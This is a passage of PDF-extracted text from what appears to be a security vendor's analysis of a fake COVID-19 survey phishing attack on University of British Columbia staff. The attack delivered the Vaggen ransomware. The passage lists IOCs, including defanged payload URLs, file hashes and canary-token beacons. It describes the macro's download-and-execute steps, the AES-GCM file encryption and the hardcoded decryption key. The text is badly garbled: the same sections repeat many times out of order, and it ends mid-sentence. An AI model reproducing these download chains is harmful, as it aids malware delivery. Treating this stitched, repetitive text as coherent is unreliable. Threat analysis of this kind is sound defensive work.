3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1594 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1595 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1596 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1597 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1598 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1599 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1600 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1601 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1602 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1603 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1604 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1605 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1606 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1607 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1608 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1609 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1610 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1611 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1612 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1613 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1614 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1615 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1616 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1617 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1618 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1619 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1620 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1621 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1622 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1623 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1624 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1625 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1626 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1627 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you 